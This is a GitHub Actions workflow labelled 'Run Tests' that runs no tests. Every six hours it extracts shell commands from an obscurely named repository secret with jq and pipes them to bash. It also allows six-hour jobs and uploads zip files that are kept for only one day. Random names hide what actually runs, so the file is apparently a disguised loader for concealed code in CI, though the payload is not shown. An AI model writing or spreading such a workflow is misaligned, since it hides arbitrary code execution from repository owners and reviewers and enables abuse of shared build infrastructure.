name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '36 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          wz930: ${{ secrets.wz930 }}
        run: |
          printf '%s' "$wz930" | jq -r .jyil5 | /bin/bash
          echo $jusc7 | jq -r .vsdum0750 | /bin/bash
          echo $ms43089 | jq -r .zmlb7 | /bin/bash
          echo $mz18939 | jq -r .x50 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: yf8RKpOU
          path: "*.zip"
          retention-days: 1
